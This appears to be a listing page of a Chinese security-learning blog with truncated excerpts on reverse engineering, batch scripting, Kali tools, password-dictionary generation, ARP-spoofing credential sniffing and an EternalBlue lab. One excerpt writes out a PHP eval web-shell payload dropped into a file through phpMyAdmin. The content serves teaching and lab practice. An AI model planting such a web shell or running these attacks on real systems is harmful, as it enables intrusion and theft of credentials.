侧边栏
上一页 1 2 3 4 5 6 7 8 9 ··· 28 下一页
摘要: 逆向之整数溢出漏洞 溢出漏洞的简介 溢出漏洞的概念: 溢出是黑客利用程序的漏洞,专门开发的一种程序,加相应的参数运行后,就可以达到某种目的。溢出是程序设计者设计时的不足所带来的错误 溢出的类型: 溢出分为缓冲区溢出、 内存溢出、数据溢出等 整数的概念 整数的分类: 在计算机中,整数分为无符号整数以及 阅读全文
posted @ 2021-04-26 11:50 菜鸟-传奇 阅读(555) 评论(0) 推荐(0)
摘要: 逆向之函数栈帧结构分析 函数的简介 函数的定义 计算机的函数,是一个固定的一个程序段,或称其为一个子程序,它在可以实现固定运算功能的同时,还带有一个入口和一个出口。 函数的入口: 函数的入口,就是函数所带的各个参数,我们可以通过这个入口,把函数的参数值代入子程序供计算机处理。 函数的出口: 函数的出 阅读全文
posted @ 2021-04-26 11:02 菜鸟-传奇 阅读(137) 评论(0) 推荐(0)
摘要: 逆向之程序堆栈 计算机内存分布 计算机内存:计算机内存分为数据段、代码段、堆段和栈段。 堆和栈在数据结构中是两种不同的数据结构。两者都是数据项按序排列的数据结构。 栈 栈的定义:后进先出的数据结构。 栈的存取规则:后存放的先取先存放的后取,类似于取放在箱子底部的东西,首先要移开压在它上面的物体 堆 阅读全文
posted @ 2021-04-26 10:55 菜鸟-传奇 阅读(181) 评论(0) 推荐(0)
摘要: 逆向之汇编语言 首先介绍计算机程序在计算机中的处理过程。 现代计算机存储和处理的信息以二值信号表示,也就是二进制序列,程序对于计算机而言就是一串二进制数据流,以流水线的方式进入CPU进行运算。主要在CPU与内存之间进行数据传递。但程序员写出来的程序是以高级语言的形式展现的,计算机不是人脑,看不懂高级 阅读全文
posted @ 2021-04-26 09:50 菜鸟-传奇 阅读(575) 评论(0) 推荐(0)
摘要: 批处理命令 一、基础语法: 1.批处理文件是一个“.bat”结尾的文本文件,这个文件的每一行都是一条DOS命令。可以使用任何文本文件编辑工具创建和修改。 2.批处理是一种简单的程序,可以用 if 和 goto 来控制流程,也可以使用 for 循环。3.批处理的编程能力远不如C语言等编程语言,也十分不 阅读全文
posted @ 2021-04-23 19:49 菜鸟-传奇 阅读(3685) 评论(1) 推荐(1)
摘要: windows中echo的用法 tree 1.echo:显示信息 echo hello 执行显示: hello 2.echo on/off:开/关回显功能 如果将@echo off放最前面,将不会显示所有命令本身,只显示输出结果 @echo off echo hello world! echo Hi 阅读全文
posted @ 2021-04-23 19:44 菜鸟-传奇 阅读(3028) 评论(0) 推荐(0)
摘要: 通过phpMyAdmin写入MySQL,获取webshell 在SQL的控制台中输入 进入http://127.0.0.1/phpMyAdmin,并在SQL中输入如下命令 select '<?php @eval($_POST[1]);?>' into outfile 'D:/phpstudy_pro 阅读全文
posted @ 2021-04-19 23:35 菜鸟-传奇 阅读(923) 评论(0) 推荐(0)
摘要: 底部小鱼特效 页面定制 CSS 代码 .container { width: 100%; height: 200px; position: fixed; z-index: -1; opacity: 0.37; bottom: 0; left: 0; } 页脚 HTML 代码 <!-- 底部小鱼 -- 阅读全文
posted @ 2021-04-18 20:39 菜鸟-传奇 阅读(306) 评论(2) 推荐(0)
摘要: kali Linux的简单介绍 Kali Linux是基于Debian 的Linux发行版,设计用于数字取证操作系统。Back Track是他们之前写的用于取证的Linux发行版。Kali Linux预装了许多渗滲透测试软件,包括nmap 、 Wireshark 、 John the Ripper, 阅读全文
posted @ 2021-04-12 11:52 菜鸟-传奇 阅读(1335) 评论(0) 推荐(0)
摘要: 在cmd中使用pip安装库报错解决和Kali安装gmpy2 在cmd中使用pip安装库 如果遇到ModuleNotFoundError: No module named 'pip’这个错误。查询了网上之后发现,这个错误可以通过两行简单的cmd命令行语句进行改正修复。 python -m ensure 阅读全文
posted @ 2021-04-12 11:43 菜鸟-传奇 阅读(1544) 评论(0) 推荐(0)
摘要: 利用kali生成字典的三种方式 字典是记录一些特殊或有目的性的密码集合,通常以txt格式进行记录保存。在渗透许多服务器、smb、ftp、ssh、远程桌面rdp、网页后台等一些用户登录时,没有正确密码,使用密码字典爆破就是最直接的黑客攻击方法 一:使用cupp工具生成 1.下载github资源 git 阅读全文
posted @ 2021-04-09 15:37 菜鸟-传奇 阅读(5694) 评论(1) 推荐(1)
摘要: 利用kali嗅探HTTP网页用户账户密码 嗅探HTTP网页 一:测试基础 1.ARP基础:使用mac地址和ip地址进行通信的局域网协议2.HTTP:一种上网、网页请求通信协议。该协议以明文传输,即在传输时不对数据进行加密,因为http的不安全性,所以在局域网环境中,可以通过ARP欺骗,将目标主机的网 阅读全文
posted @ 2021-04-09 15:25 菜鸟-传奇 阅读(5081) 评论(0) 推荐(0)
摘要: 永恒之蓝(ms017-010)漏洞利用 1、实验环境 靶机win7 地址:192.168.1.xxx 登录密码:xxxx 攻击机:kail linux 地址:192.168.1.xxx 登录用户名:root 登录密码:xxx 2、实验原理: “永恒之蓝”的原理主要是扫描所有开放445文件共享端口的W 阅读全文
posted @ 2021-04-09 10:04 菜鸟-传奇 阅读(921) 评论(0) 推荐(0)
摘要: 逆向之OllyDbg调试细则 快捷键转载 OllyDbg 窗口通用快捷键 快捷键 功能 Ctrl + F2 重启程序,即重新启动被调试程序( 重新载入程序 )。如果当前没有调试的程序,OllyDbg会运行历史列表[historylist]中的第一个程序。程序重启后,将会删除所有内存断点和硬件断点。译 阅读全文
posted @ 2021-04-07 10:31 菜鸟-传奇 阅读(728) 评论(0) 推荐(0)
摘要: 如何使用最新Microsoft Edge打开Flash页面 使用最新版本的IE浏览器无法打开flash相关的页面,有关最新版本的谷歌内核相关浏览器都出现相关问题.flash的设置都找不到. 以下是解决最新IE浏览器打开flash的方法,仅供参考. 第一步:打开最新IE浏览器 点击设置,-->点击默认 阅读全文
posted @ 2021-04-06 15:30 菜鸟-传奇 阅读(7202) 评论(1) 推荐(0)
上一页 1 2 3 4 5 6 7 8 9 ··· 28 下一页